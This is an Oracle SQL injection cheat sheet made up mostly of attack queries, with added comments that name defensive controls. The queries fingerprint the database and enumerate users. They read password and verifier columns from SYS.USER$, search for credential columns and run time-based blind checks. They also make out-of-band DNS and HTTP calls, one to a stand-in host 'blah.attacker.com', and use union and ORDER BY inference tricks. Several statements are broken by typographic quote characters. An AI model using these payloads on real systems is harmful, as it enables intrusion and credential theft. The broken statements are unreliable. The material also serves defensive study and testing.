
Oracle SQL Injection Cheat Sheet - W

This document contains a collection of SQL queries targeting an Oracle database. The queries retrieve information about the database instance, users, privileges, and tables, and exercise basic functions. Some queries appear aimed at reconnaissance of the database.

-- Version fingerprinting: v$version returns one banner row per component, and
-- the LIKE filters pick out the database banner and the TNS listener banner.
-- v$instance.version returns the release string of the running instance.
-- NOTE(review): whether an application account can read these V$ views depends
-- on its grants; a least-privilege application login normally has no need to.
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'

SELECT banner FROM v$version WHERE banner LIKE 'TNS%'


SELECT version FROM v$instance
-- DUAL is Oracle's one-row dummy table; selecting a constant from it is a
-- harmless probe that a statement executes at all.
SELECT 1 FROM dual
-- USER is the name of the account the current session is running as.
SELECT user FROM dual
-- Account enumeration: ALL_USERS lists the database accounts by name.
SELECT username FROM all_users ORDER BY username
-- SYS.USER$ is the data-dictionary base table behind the user views. The three
-- queries below read account names, then the password and astatus columns, then
-- the spare4 column, which on newer releases holds the password verifier strings.
-- Defensive note: nothing outside DBA tooling should ever read SYS.USER$; audit
-- SELECT on it and treat any application account that can read it as
-- over-privileged. (Recent releases exclude USER$ from SELECT ANY DICTIONARY --
-- verify for the version in use.)
SELECT name FROM sys.user$
SELECT name, password, astatus FROM sys.user$
SELECT name,spare4 FROM sys.user$
-- Privilege review. SESSION_PRIVS shows the system privileges enabled in the
-- current session; the DBA_* views show grants across all accounts and are only
-- readable with DBA-level dictionary access.
-- The same queries are what an administrator runs when checking for privilege
-- creep, so their output is worth reviewing on a schedule.
SELECT * FROM session_privs
-- System privileges held by one named grantee ('DBSNMP' is the example account).
SELECT * FROM dba_sys_privs WHERE grantee = 'DBSNMP'
-- Who can read the whole data dictionary.
SELECT grantee FROM dba_sys_privs WHERE privilege = 'SELECT ANY DICTIONARY'
-- Role memberships for every grantee.
SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS
-- Grantees who hold at least one system privilege WITH ADMIN OPTION, i.e. who
-- can pass that privilege on to others.
SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES'
-- Four ways of reading the name of the database / instance the session is
-- connected to: the GLOBAL_NAME view, v$database, v$instance, and the
-- SYS.DATABASE_NAME function.
SELECT global_name FROM global_name
SELECT name FROM v$database
SELECT instance_name FROM v$instance
SELECT SYS.DATABASE_NAME FROM DUAL
-- Schema enumeration through the ALL_* dictionary views. These views only
-- return objects the current account has been granted access to, so the
-- amount of information they reveal is bounded by the account's privileges;
-- narrow grants on the application login are the control here.
-- Schemas (owners) that have at least one visible table.
SELECT DISTINCT owner FROM all_tables
-- Columns of one table; 'blah' and 'foo' are placeholder table/owner names.
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah'
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo'
-- Visible tables, without and with their owning schema.
SELECT table_name FROM all_tables
SELECT owner, table_name FROM all_tables
-- Tables that have a column whose name contains PASS, i.e. likely credential
-- columns. Defensive note: such columns should hold salted hashes only, and
-- SELECT on those tables should not be granted to general-purpose accounts.
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'
-- Returns a single row from ALL_USERS by number: the inner query tags each row
-- with ROWNUM as r, the outer query keeps the row where r = 9.
-- NOTE(review): ROWNUM is assigned before the ORDER BY of the same query block
-- is applied, so r is not guaranteed to be the position in username order.
SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username)
WHERE r=9
-- Built-in scalar functions, each evaluated once against DUAL.
-- substr(string, start, length): one character starting at position 3 -> 'c'.
SELECT substr('abcd', 3, 1) FROM dual
-- bitand: bitwise AND of two integers (6 AND 2 = 2, 6 AND 1 = 0).
SELECT bitand(6,2) FROM dual
SELECT bitand(6,1) FROM dual
-- chr / ascii convert between a character code and its character (65 <-> 'A').
SELECT chr(65) FROM dual
SELECT ascii('A') FROM dual
-- CAST between numeric and character types.
SELECT CAST(1 AS char) FROM dual
-- NOTE(review): the closing quote after 1 below is a typographic prime (U+2032),
-- apparently an extraction artefact; the statement does not parse as written.
SELECT CAST('1′ AS int) FROM dual
-- || is the string concatenation operator; the result is 'AB'.
SELECT 'A' || 'B' FROM dual
-- Conditional logic and delays.
-- PL/SQL anonymous block: sleeps 3 seconds when the condition holds, 0 otherwise.
-- A response time that depends on a condition is the basis of time-based blind
-- injection. Defensive note: application accounts should not hold EXECUTE on
-- DBMS_LOCK, and unexplained latency spikes on a single endpoint are worth
-- alerting on.
BEGIN IF 1=1 THEN dbms_lock.sleep(3) ELSE dbms_lock.sleep(0) END IF END
-- CASE expression usable inside a plain SELECT: returns 1 for a true condition,
-- 2 for a false one.
SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual
SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual
-- Builds the string 'AB' from character codes, with no quote characters in the
-- statement. This is why input filters that only strip or escape quotes are not
-- a substitute for bind variables.
SELECT chr(65) || chr(66) FROM dual
-- Unconditional 5-second pause of the session.
BEGIN DBMS_LOCK.SLEEP(5) END
-- Network-capable packages: each call makes the database server itself perform
-- a DNS lookup (UTL_INADDR) or an HTTP request (UTL_HTTP). Host names and the
-- address used here are placeholders from the original page.
-- Defensive note: these give a database an outbound channel. Restrict them with
-- network ACLs (DBMS_NETWORK_ACL_ADMIN), revoke EXECUTE on UTL_HTTP / UTL_INADDR
-- from PUBLIC where the application does not need them, block outbound traffic
-- from database hosts at the firewall, and monitor DNS queries that originate
-- from database servers.
-- NOTE(review): the closing quote after 10.0.0.1 below is a typographic prime
-- (U+2032), apparently an extraction artefact.
SELECT UTL_INADDR.get_host_name('10.0.0.1′) FROM dual
SELECT UTL_INADDR.get_host_address('blah.attacker.com') FROM dual
-- NOTE(review): the URL below looks mangled by the hosting site's link
-- rewriting; it is kept exactly as it appears on the page.
SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual
SELECT UTL_INADDR.get_host_address('google.com') FROM dual
SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual
-- Server-side file access setting: utl_file_dir lists the operating-system
-- directories that UTL_FILE may read and write. A wide value (or '*') is a
-- configuration finding; directory objects with explicit grants are the
-- controlled alternative.
SELECT value FROM v$parameter2 WHERE name = 'utl_file_dir'
-- Host identity of the database server: its host name (via UTL_INADDR with no
-- argument, and via v$instance) and its IP address.
SELECT UTL_INADDR.get_host_name FROM dual
SELECT host_name FROM v$instance
SELECT UTL_INADDR.get_host_address FROM dual
-- Reverse lookup of a placeholder address.
-- NOTE(review): the closing quote is again a typographic prime (U+2032).
SELECT UTL_INADDR.get_host_name('10.0.0.1′) FROM dual
-- File-system paths of the database's data files.
SELECT name FROM V$DATAFILE
-- The two bare words below are not SQL; they appear to be the names of Oracle's
-- default system tablespaces, listed on the page as reference values.
SYSTEM
SYSAUX
-- Aggregates every visible table name into one comma-separated string
-- (xmlagg over xmlelement, text extracted, trailing comma trimmed), so a result
-- that can only carry a single row still carries the whole list.
-- The text after the dash is the original author's remark, not SQL; the page
-- uses a typographic dash rather than the "--" comment marker.
-- NOTE(review): .extract('//text()') appears twice in a row on the page.
select rtrim(xmlagg(xmlelement(e, table_name ||
',')).extract('//text()').extract('//text()') ,',') from all_tables –  when using
union based SQLI with only one row
-- ORDER BY fragment, not a complete statement: the sort column is chosen by a
-- CASE over a subquery, so the row order of the response reveals whether the
-- subquery condition is true. column_name1 / column_name2 are placeholders.
-- Defensive note: a sort column cannot be supplied as a bind variable, so
-- applications that let the client choose the sort order must map the request
-- to a fixed allow-list of column names and never splice request text into
-- the ORDER BY clause.
order by case when ((select 1 from user_tables where substr(lower(table_name), 1,
1) = 'a' and rownum = 1)=1) then column_name1 else column_name2 end — you must know
2 column names with the same datatype
